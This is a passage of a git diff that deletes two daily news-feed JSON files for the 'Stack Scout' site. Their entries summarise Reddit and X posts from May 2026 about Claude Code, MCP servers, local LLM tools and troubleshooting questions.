server that cuts Claude Code token burn 45–72% on architectural questions (TS/Python/Go)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdy7ww/beta_testers_wanted_mcp_server_that_cuts_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-05-15T14:35:49.000Z", - "summary": "Claude Code learns your codebase by brute force every session. 
A single architectural question such as; \"Where does request validation happen?\" can chew through 40+ tool calls and 100k tokens reconstructing context. Worse, the architectural decisions that *govern* your code, your ADRs, design docs, \"we did it this way because\" reasoning are completely invisible to it. Claude will happily propose changes that break constraints you wrote down two months ago. I built an MCP server that pre-computes a structured atlas of your codebase (LSP symbols + ADRs + git history + test associations) and serves it to Claude in a fraction of the calls via compact chunks at execution time. Internal benchmarks show **45–72% token reduction on architectural-intent prompts**, replicated across TypeScript (hono), Python (httpx), and Go (cobra) targets. Methodology is paired-mode LLM-judge with pre-registered thresholds. Full rubric and benchmarks repo are public. I also saw cleaner scope adherence and better design choices when implementing new features, driven by the `impact_of_change` tool surfacing constraints before Claude proposes work. v1.0.0 is planned to ship next week. 
Before then I hoped to f…", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-16.json b/data/news-feed-2026-05-16.json deleted file mode 100644 index c6a402f..0000000 --- a/data/news-feed-2026-05-16.json +++ /dev/null @@ -1,275 +0,0 @@ -{ - "generated": "2026-06-05T00:44:40.446Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-16", - "article_count": 15, - "archived_story_count": 407, - "articles": [ - { - "title": "Follow-up: the Claude design-spec library is 100 apps now, iOS + Android.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tevt37/followup_the_claude_designspec_library_is_100/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-16T14:50:57.000Z", - "summary": "Yesterday I posted about turning 50 apps into Claude-readable design specs. It did better than expected, and the two asks in the comments were: more apps, and Android. Both done. The library is now: \\- 100 apps (was 50) \\- iOS and Android spec for every one The Android pass surfaced something the iOS-only version hid. The problem: an iOS-only spec quietly encodes HIG assumptions you didn't know you were making. Hand it to Claude, ask for the Android build, and you get an iOS app in Android's clothes: \\- back behavior wrong, no system back \\- flat surfaces, no Material elevation \\- tab bar where a nav drawer or bottom nav belongs \\- SF type scale instead of Roboto and Material The fix: split each spec into two layers. \\- Product intent: hierarchy, flow, states. Invariant across platforms. \\- Platform layer: Material vs HIG conventions. Swappable. Claude clones far more cleanly when it isn't guessing which layer it's looking at. 
Repo, both layers, 100 apps, 3 depths each, markdown, MIT, no dependencies: [github.com/Meliwat/awesome-ios-design-md](http://github.com/Meliwat/awesome-ios-design-md) The MCP server and CLI that generate these are free and open source too, so you can spec y…", - "category": "ai_tools" - }, - { - "title": "GitHub - richardr1126/openreader: An open-source read-along document reader server with high-quality TTS options, synchronized highlighting, and audiobook export for EPUB, PDF, DOCX, TXT, and MD.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tf15eh/github_richardr1126openreader_an_opensource/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "github_release" - ], - "matching_tags": [ - "api_update", - "open_source", - "github_release" - ], - "importance": 1, - "date": "2026-05-16T18:12:10.000Z", - "summary": "Sharing my latest release of OpenReader v3.0.0, an open-source text-to-speech document reader and audiobook exporter. It has been live for over a year now, and slowly has gained 300+ GitHub stars. **What is OpenReader?** A Next.js web app for reading and listening to EPUB, PDF, TXT, Markdown, and DOCX files. * Supports multiple TTS providers: OpenAI, Replicate, Deepinfra, and self-hosted OpenAI-compatible APIs (like [Kokoro-FastAPI](https://github.com/remsky/Kokoro-FastAPI), [KittenTTS-FastAPI](https://github.com/richardr1126/KittenTTS-FastAPI)). * **Self-hosted:** your documents, TTS audio, and settings all live on your own server in SQLite or Postgres and Embedded SeaweedFS or External S3. * **Audiobook export:** generate and download m4b/mp3 audiobooks with chapter metadata via ffmpeg. **What's new in v3.0.0?** * TTS now preloads audio across multiple pages ahead of where you are. * Audio is cached persistently on the server's embedded or external object storage. * New Admin panel (set `ADMIN_EMAILS` in your env) for managing multiple named TTS providers with separate API keys. 
* Site-wide feature flags (user signups, provider restrictions, etc.) are now manageable from the Adm…", - "category": "ai_models" - }, - { - "title": "macOS support in Lemonade has graduated out of beta!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tevjjr/macos_support_in_lemonade_has_graduated_out_of/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-16T14:40:45.000Z", - "summary": "All major Lemonade capabilities, including OmniRouter, coding, image gen, speech gen, and transcription are all available on Lemonade for macOS thanks to the hard work of u/GeramyL. If you're on macOS and just looking into Lemonade for the first time, we're a local AI solution similar in functionality to LM Studio or Ollama. What sets us apart is: - Open source, community driven, zero telemetry - Focused on local with no cloud upsell - Omni-modal with the ability to input and output images and speech - Developer friendly with a 3 MB portable binary, code once and deploy across Linux/Windows/macOS I hope this release brings more macOS users into the Lemonade community. Stay tuned for the update iPhone app, which can access all of this from your phone! 
GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk", - "category": "ai_models" - }, - { - "title": "Claude Code in VS Code keeps “answering” by freezing mid-stream, logs show sdk_stream_ended_no_result", - "url": "https://reddit.com/r/ClaudeAI/comments/1tenric/claude_code_in_vs_code_keeps_answering_by/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-16T08:28:58.000Z", - "summary": "[error message on Claude extension for VS Code](https://preview.redd.it/08qtvuaamg1h1.png?width=910&format=png&auto=webp&s=6c2d4005bcdd6e5c058e5235b8d76b0512753ee6) I’m trying to use Claude Code in VS Code, but it has become almost unusable for larger tasks. The logs show Claude authenticates fine, sends the /v1/messages request, receives the first stream chunk, then the stream stalls. After about 30 seconds the UI reports an error with: eventName: \"sdk\\_stream\\_ended\\_no\\_result\", had\\_error: true It is not a simple auth/config failure: OAuth check completes, context window says OK, and the API stream opens. Smaller requests seem to work, but larger multi-part prompts repeatedly freeze with stream stall warnings like: \\[Stall\\] stream\\_idle\\_partial lastChunkAgeMs=15002 bytesTotal=669 idleDeadlineMs=300000 There are some unrelated MCP auth/config errors too, but the main issue is that Claude starts responding and then stops producing a usable answer. Has anyone else seen Claude Code/VS Code fail this way on large prompts? Is this a known streaming bug, server-side issue, or something caused by heavy tool/skill context?", - "category": "ai_tools" - }, - { - "title": "WSL can't reach Kobold.cpp running on Windows, even though the API works fine in PowerShell, SillyTavern & a Kenshi SentientSands Mod. 
Does anyone know the solution?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tf7f4d/wsl_cant_reach_koboldcpp_running_on_windows_even/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-16T22:24:17.000Z", - "summary": "Okay sorry for the slop below but I'm losing my mind with this and I'm hoping someone here has dealt with the same setup. (I asked the AI that let me copy&paste shit for 3 hours to summarise what it asked me to do) Here's the situation: * Kobold.cpp is running on Windows * The OpenAI-compatible API is on port 5001 * It works from PowerShell on Windows, SillyTavern and a Kenshi Mod (SentientSands) * But WSL cannot connect to it, even though it's the same machine Kobold.cpp starts normally and shows that the OpenAI-compatible API is running on `http://0.0.0.0:5001/v1/`. From **PowerShell**, this works fine: bash curl http://127.0.0.1:5001/v1/models and it returns the model list. 
From **WSL**, `pwd` works normally, but this fails: bash curl http://127.0.0.1:5001/v1/models with: bash curl: (7) Failed to connect to 127.0.0.1 port 5001 after 0 ms: Could not connect to server So at this point I know: * Kobold itself is running fine * The API endpoint is working on Windows * The actual problem is specifically WSL trying to reach a service hosted on the Windows side Things I already tried: * Binding Kobold to [`0.0.0.0`](http://0.0.0.0) instead of only localhost * Changing WSL config t…", - "category": "ai_models" - }, - { - "title": "I replicated Anthropic's Generator-Evaluator harness to build a website through 12 adversarial AI iterations - here's the result and what I learned", - "url": "https://reddit.com/r/ClaudeAI/comments/1tf76wp/i_replicated_anthropics_generatorevaluator/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-16T22:14:25.000Z", - "summary": "Anthropic recently published their [harness design for long-running apps](https://www.anthropic.com/engineering/harness-design-long-running-apps) — a multi-agent architecture inspired by GANs where a Generator builds code and an Evaluator critiques it in a loop. I built my own version using Kiro CLI and used it to generate a marketing website for my project [Mnemo](https://github.com/Mnemo-mcp/Mnemo) (persistent memory for AI coding agents). **The architecture:** Planner (runs once) → Generator ↔ Evaluator (12 iterations) Each agent is a separate CLI process with zero shared context. They communicate only through files (spec.md, eval-report.md). The Evaluator uses Playwright to actually browse the live site — not just read code. **What made it work:** **Clean slate per invocation** — each agent starts fresh, reads only its input files. Prevents context anxiety. **Playwright MCP for testing** — the evaluator navigates, clicks, resizes viewports. 
Catches visual bugs code review never would. **Anthropic's frontend design skill** — explicitly penalizes generic AI patterns (Inter font, purple gradients, card layouts). Forces creative risk-taking. **Continuous iteration, not retry-on-fa…", - "category": "ai_tools" - }, - { - "title": "Interconnects newsletter reviews wave of open AI releasesOpen AI models saw a burst of new releases this month from several labs. The Interconnects newsletter reviewed five of them, including Gemma 4 and DeepSeek V4, using the CAISI V4 evaluation framework.", - "url": "https://www.digg.com/ai/09imapy5?rank=7", - "source": "Digg AI", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-16T20:04:50.938Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "How I started programming differently over the last year. What about you?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tf2cxh/how_i_started_programming_differently_over_the/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-16T18:58:05.000Z", - "summary": "An interesting observation: I’ve stopped using the LLM-powered autocomplete in my IDE. At first, it was one of the key features for me. It felt extremely convenient: you start writing a function in your code, and the LLM completes it based on common sense or the context from the open tabs. But the most interesting thing is that back when LLM autocomplete was useful and in demand, I had already written a script that could go through the source files, let me select what I needed, and prepare the context to feed into an LLM chat so it could tell me what to add or fix. I worked like that for about six months. And even that is gone now. These days it’s easier to open a CLI interface with a coding agent, without even launching the IDE. 
You describe what you need, use @ to point it to the files it should inspect or modify, and that’s it. Everything is changing at an absolutely insane speed. Basically, the only things I still use an IDE for are nice Git diff visualization, step-by-step debugging, and the ability to click on functions and jump into their implementation. In other words, code navigation. And even that functionality is only needed in about 5-10% of my work. It’s interesting t…", - "category": "ai_models" - }, - { - "title": "LLM Phone Home: Reliable Apps that can deliver inference from local backend", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tez9sb/llm_phone_home_reliable_apps_that_can_deliver/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-16T17:02:05.000Z", - "summary": "Hello all, I’m wondering what suggestions there are for an ios app that can serve an openai compatible endpoint. I am using 3sparks which works GREAT for that specific use, BUT, there is no mcp, no web search, etc. I want to show people that a local model with web search on your phone is very impressive, but I can’t find an app that can mimic OWUI/LMS/etc. Texting Hermes works but I was hoping to find a solution that is not using a slow agent, just calling requests from local server. So far, I tried: Apollo, Locally AI, Noema, and 3 Sparks. Previously I have gone through other apps that run models in situ (in the iphone) but they don’t have remote endpoint usage. 
Noema seemed promising but Deepseek V4 Flash from my mac studio never makes it through a request (works great with 3 Sparks, but no web search or mcp capability).", - "category": "ai_models" - }, - { - "title": "Frameo AI Launches Pixar-Style Short Films Powered by Seedance 2.0 — Native Audio, Multi-Shot, Director Mode", - "url": "https://x.com/frameo_ai/status/2055642282796400821", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-16T14:56:25.012Z", - "summary": "Frameo AI launched Pixar-quality short films on Seedance 2.0 with native audio and Director Mode, making cinematic AI video creation accessible to independent creative producers.", - "category": "ai_tools" - }, - { - "title": "How Do You Tell If Someone Is Good at Agents? — Scoble Asks the Question the AI Industry Cannot Answer", - "url": "https://x.com/Scobleizer/status/2055566706714845328", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-16T14:52:06.433Z", - "summary": "Scoble's question on evaluating agent development talent surfaces the unsolved hiring signal problem as companies scramble for AI agent skills with no reliable credential or assessment framework.", - "category": "ai_tools" - }, - { - "title": "Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1temio0/qwen3635ba3b_and_9b_are_officially_on_the_public/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-16T07:19:25.000Z", - "summary": "Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard! 
little-coder × Qwen3.6-35B-A3B hit 24.6% (±3.2), and **now land above Gemini 2.5 Pro on Gemini CLI (19.6%)** and Qwen3-Coder-480B on Terminus 2 (23.9%). I didn’t expect the scaffold-model gap from Polyglot to hold on a benchmark this hard but it did! little-coder × Qwen3.5-9B came in at 9.2% which is more humble. Yet, it also shows again that **sub-10B local models are now measurable on a hard agentic benchmark**, not assumed unworthy of a slot. Just felt it was right to follow up here as you requested, and say a genuine thanks to this community. It really is the place currently driving innovation toward less compute, and this run exists there because you pushed for it. Now it’s time to head for the top of the leaderboard 👀 let’s go open source!", - "category": "ai_models" - }, - { - "title": "Claude in Chrome extension stopped working in claude.ai after using Claude Code — anyone else?", - "url": "https://reddit.com/r/ClaudeAI/comments/1teudps/claude_in_chrome_extension_stopped_working_in/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.88, - "date": "2026-05-16T13:55:37.000Z", - "summary": "Hey everyone, running into a weird issue and hoping someone has seen this before. A few hours ago, Claude in Chrome was working fine in the claude.ai web app. Then I started using Claude Code (CLI) with the \\`--chrome\\` flag, which connected to the extension no problem. Ever since, the extension refuses to connect from claude.ai — but it still works fine from Claude Code and the extension itself appears active and logged in. 
\\*\\*Setup:\\*\\* \\- Claude in Chrome extension installed and signed in \\- Same account on [claude.ai](http://claude.ai) and Claude Code \\- Extension shows as active in Chrome toolbar \\*\\*What works:\\*\\* \\- ✅ Claude Code CLI (\\`claude --chrome\\`) connects to the browser fine \\- ✅ Extension itself appears active and logged in \\- ❌ [claude.ai](http://claude.ai) web app: consistently returns \"Browser extension is not connected\" \\*\\*What I've already tried (nothing helped):\\*\\* \\- Restarted Chrome \\- Restarted PC \\- Logged out and back into [claude.ai](http://claude.ai) \\- Disabled and re-enabled the extension My theory: once Claude Code connected to the extension, it somehow \"claimed\" the connection and the [claude.ai](http://claude.ai) web app can no longer get thr…", - "category": "ai_tools" - }, - { - "title": "Free Premiere Pro extension to download YouTube/Instagram/X videos and auto-import to your project bin", - "url": "https://reddit.com/r/ClaudeAI/comments/1tf20ta/free_premiere_pro_extension_to_download/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.78, - "date": "2026-05-16T18:45:19.000Z", - "summary": "Tired of the whole workflow — open browser, find video, download, wait, drag into Premiere. So I built a panel that does it all from inside Premiere. Paste a URL, pick quality, click Download & Import — file lands directly in your project bin. Supports: \\- YouTube, Instagram, X/Twitter \\- Best / 1080p / 720p / 480p / MP3 \\- Live progress bar with ETA \\- Auto-import to project bin on finish Powered by yt-dlp under the hood. Built this with the help of Claude (AI) — had the idea and kept iterating until it worked. Free & open source: [https://github.com/gitttsarya/media-fetcher-premiere](https://github.com/gitttsarya/media-fetcher-premiere) Full install guide in the README. Let me know if you run into any issues! 
https://preview.redd.it/y5svnpjuoj1h1.png?width=482&format=png&auto=webp&s=0dfb391daefb06dbbb37c4b13174efc6a1ca7a22", - "category": "ai_tools" - }, - { - "title": "Using Claude chat for making Apps.", - "url": "https://reddit.com/r/ClaudeAI/comments/1teum62/using_claude_chat_for_making_apps/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.78, - "date": "2026-05-16T14:05:01.000Z", - "summary": "I have been using Claude chat to build structural engineering calculation apps, and it has worked very well for me. Claude generates the files, and I host the projects on GitHub. To avoid hitting the context window limit, I periodically start new chat sessions. When I do, I download the ZIP file from GitHub (including the MD file), and paste it into the new chat so Claude has the project context again. I was wondering if there are any drawbacks to working this way. I do not use Claude Code (don’t have coding background )or the terminal much. I tried it once but did not really like the workflow. 
Most of my coding is done on the go through the chat interface on my phone or on my computer at work and at home.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-17.json b/data/news-feed-2026-05-17.json deleted file mode 100644 index 75d5bae..0000000 --- a/data/news-feed-2026-05-17.json +++ /dev/null @@ -1,267 +0,0 @@ -{ - "generated": "2026-06-05T00:44:40.711Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-17", - "article_count": 15, - "archived_story_count": 420, - "articles": [ - { - "title": "I built SeeFlow - architecture diagrams that actually run, wired to your live app", - "url": "https://reddit.com/r/ClaudeAI/comments/1tfd6j6/i_built_seeflow_architecture_diagrams_that/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "open_source", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-17T02:50:20.000Z", - "summary": "Architecture diagrams rot. You spend an afternoon in Confluence, three months later it's wrong, and nobody updates it because there's no forcing function. https://preview.redd.it/9svmg8ih3m1h1.png?width=2508&format=png&auto=webp&s=0d06df1f82fd417ee9a45e504efd26628eaf33fd SeeFlow tries to fix that by making diagrams executable. It generates a flow canvas from your codebase, then wires each node to your actual running app. There's a Claude Code / Codex/ Cursor / Windsurf plugin that does the heavy lifting: >/seeflow show me the shopping cart feature It also ships an MCP server so any MCP-aware editor can register and edit demos without leaving the IDE. 
Link to the site: [https://seeflow.dev](https://seeflow.dev) 100% Free/ MIT Open Source", - "category": "ai_tools" - }, - { - "title": "ROCm 7.13 nightly adds strix halo optimizations", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tftg09/rocm_713_nightly_adds_strix_halo_optimizations/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-17T15:56:56.000Z", - "summary": "[https://www.phoronix.com/news/ROCm-7.13-Released](https://www.phoronix.com/news/ROCm-7.13-Released) Quote: ...new optimizations for Ryzen AI Max 300 \"Strix Halo\" and the ROCprof Trace Decoder is now open-source...<snip>... Those rolling from source can grab the ROCm 7.13 Tech Preview via [TheRock on GitHub](https://github.com/ROCm/TheRock/releases/tag/therock-7.13). [https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html](https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html) Trivia: Rocm name origin: radeon open compute module", - "category": "ai_models" - }, - { - "title": "I updated my tool that turns any book into character & landscape images using RAG + ComfyUI/Gemini — now with Locations support!", - "url": "https://reddit.com/r/StableDiffusion/comments/1tfro2h/i_updated_my_tool_that_turns_any_book_into/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source", - "tool_update" - ], - "matching_tags": [ - "api_update", - "open_source", - "tool_update" - ], - "importance": 0.78, - "date": "2026-05-17T14:51:01.000Z", - "summary": "Hey everyone! I am back with an update to my character generation tool. I got some great feedback when I posted it here, I am pleased to announce that I have integrated a lot of requested features and added a lot more ! 
**Big thanks to everyone who tried the tool from the first post and gave valuable suggestions !** All the updates and features for just 2.99 a month ! No, just kidding, still fully open source. **Image gallery -** Modern Dracula adaptation, plus some characters from the Eye of the world ( which inspired this whole project ). Tool screenshots at the end. # What's new in this update? # 🔧 QoL updates ! Configurable .env file, api endpoints for Ollama, OpenAI etc, database for books generated, character details saved after generation, image gallery, prompt save feature, installer, updated UI, support for epub/text, Gemini image integration, collapsible sidebars, task manager widget, debug panel to test connections or databases, and tons more # 📍 Locations Tab — \"The one I didn't know I needed\" This was the exciting one. You can now generate **landscape/architectural images** for prominent locations in the book — not just characters. * Click **\"Extract Locations from…", - "category": "creative_tools" - }, - { - "title": "Are local models good enough yet for AI meeting memory?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tfukyl/are_local_models_good_enough_yet_for_ai_meeting/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-17T16:38:58.000Z", - "summary": "I’ve been testing different ways to handle AI meeting notes and realized the most useful part isn’t the summary, it’s having searchable context from past meetings later. Right now I’m using Bluedot because it handles capture really well, transcripts, summaries, action items, recordings, all searchable after. The new Claude MCP integration made me realize how valuable meeting history becomes once you can actually query it naturally. 
Are you building local AI meeting memory setups, or are cloud tools still way ahead for this use case?", - "category": "ai_models" - }, - { - "title": "NeuralCompanion", - "url": "https://reddit.com/r/StableDiffusion/comments/1tftqwg/neuralcompanion/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-17T16:07:34.000Z", - "summary": "NeuralCompanion is an open-source, local-first AI companion project for people who like building, experimenting, and seeing how far personal AI can go on their own hardware. It brings together realtime voice chat, local LLMs, TTS/STT, image generation, interactive tutorials, API-friendly workflows, and a modular addon system into one desktop app designed to be flexible, hackable, and genuinely fun to explore. NC also supports avatar systems and avatar engines like VSeeFace, VAM/VAM2, and other experimental realtime avatar workflows. It is still experimental and a little rough around the edges in places, but that is part of the project. The goal is not to make another locked-down corporate assistant. It is to build a customizable AI companion platform you can actually run, modify, and shape yourself. If you are into local AI, creative tools, avatars, plugins, voice interfaces, automation, or weird future-facing software, come take a look. 
GitHub: [https://github.com/Rakile/NeuralCompanion](https://github.com/Rakile/NeuralCompanion) Discord: [https://discord.com/invite/UqnwX46rcK](https://discord.com/invite/UqnwX46rcK) Developers, tinkerers, artists, AI enthusiasts, and curious peop…", - "category": "creative_tools" - }, - { - "title": "Made a simple template manager and GUI for llama.cpp so I don't have to keep memorizing CLI flags.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tfqrbt/made_a_simple_template_manager_and_gui_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-17T14:15:45.000Z", - "summary": "[Introducing Hexllama](https://reddit.com/link/1tfqrbt/video/uobdgqq1hp1h1/player) Hey, I’ve always found **llama-server** to be more than enough for testing out local models, mostly because it guarantees you always have the absolute latest llama.cpp features and architecture support. But keeping track of different CLI commands, context sizes, and batch settings for different models was becoming a massive headache. Plus, managing multiple terminal tabs when I wanted to run two models at once was annoying. So, I built **Hexllama**. It's a fast desktop interface that gets out of your way and just makes managing llama.cpp easier. No walled gardens, just a clean wrapper. **What it actually does:** * **Template-Based Execution:** You configure your CLI flags (threads, context, etc.) once via a visual editor, save it as a template, and from then on it’s just one click to run. * **Built-in llama.cpp Version Manager:** This is the feature I use the most. It auto-checks the ggml-org repo, lets you download new releases directly in the app, and lets you swap backends instantly (super useful when a new model architecture drops and needs a specific build). 
* **Integrated HF Downloader:** Sear…", - "category": "ai_models" - }, - { - "title": "Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription", - "url": "https://x.com/lordsa_m/status/2055959075012104631", - "source": "X search / AI model updates", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-17T10:30:16.000Z", - "summary": "Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription", - "category": "ai_models" - }, - { - "title": "Is there a new Wan2.2 lightx2v (20260412) FP8 version for ComfyUI?", - "url": "https://reddit.com/r/StableDiffusion/comments/1tfkwx7/is_there_a_new_wan22_lightx2v_20260412_fp8/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 1, - "date": "2026-05-17T09:43:32.000Z", - "summary": "I decided to check the `lightx2v` Hugging Face account and noticed they released an updated version of their distilled Wan2.2 i2v A14b model about a month ago. They uploaded a new version 20260412 on Hugging Face, \"Wan2.2-Distill-Models\" repository. (Can't post a link because Reddit filters block the post) However, they only uploaded the FP32 version, which is also incompatible with ComfyUI. I can't find a converted version via Google or Hugging Face search. 
Does anyone know how to convert this model to FP8, or would someone be willing to convert it and upload it?", - "category": "creative_tools" - }, - { - "title": "Jackrong/Qwopus3.5-9B-Coder-GGUF · Hugging Face", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tfin40/jackrongqwopus359bcodergguf_hugging_face/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-17T07:33:35.000Z", - "summary": ">**Qwopus3.5-9B-coder** is specially optimized and fine-tuned for high-performance **🤖 Agentic Coding, complex Tool Calling, and logical reasoning.** >*💡* ***Why the 9B Dense Model?*** *We believe that the 9B dense architecture represents the perfect* ***\"sweet spot\"*** *for large language models. It runs seamlessly at 8-bit precision on entry-level 16GB RAM devices—such as standard laptops and the Mac mini—making it exceptionally lightweight yet highly versatile. Without requiring expensive hardware, it allows you to achieve excellent performance paired with impressive inference speeds. Simply put,* ***Qwen3.5-9B is currently the best open-source model in its class.*** # 🛠 Training Strategy The fine-tuning process of this model deeply integrates **Trace Inversion** data augmentation technology with high-quality **Agent Traces**. This systematic approach not only strengthens the model's ability to solve complex programming tasks, but also greatly improves its logical coherence and accuracy when using various tools. This model is designed specifically for the following goals: * 🧩 More structured and stronger logical reasoning capabilities, reducing repetitive thinking * �…", - "category": "ai_models" - }, - { - "title": "2026.5.16 released. 
Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:", - "url": "https://x.com/OliverB72157882/status/2055972796711502049", - "source": "X search / AI model updates", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.9800000000000001, - "date": "2026-05-17T11:24:47.000Z", - "summary": "2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:", - "category": "ai_models" - }, - { - "title": "I ran 100 Claude + Codex sessions in parallel to understand what I'm doing wrong in marketing my open source \"Claude Command Center\". Here's the playbook they came up with.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tfbxmf/i_ran_100_claude_codex_sessions_in_parallel_to/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.9400000000000001, - "date": "2026-05-17T01:50:08.000Z", - "summary": "A week ago I launched my open-source project (Claude Control Center) on this subreddit. Got 0 upvotes. Dead in 5 hours. :) \\[The app is awesome - great way to manage multiple sessions and avoid waiting on top of Claude + Codex - try it :) [git:amirfish1/ccc](http://github.com/amirfish1/claude-command-center) . So I spawned **100 Claude + Codex agents** in parallel and asked them to figure out what I did wrong (It had two hours left on my weekly Claude limit and 20% left - tried to think of good use :) ) . 30 minutes and 100 artifacts later, they handed me back a playbook. https://reddit.com/link/1tfbxmf/video/0mi1ytksol1h1/player The headline finding: stars don't come from better code. They come from: marketing surface. 
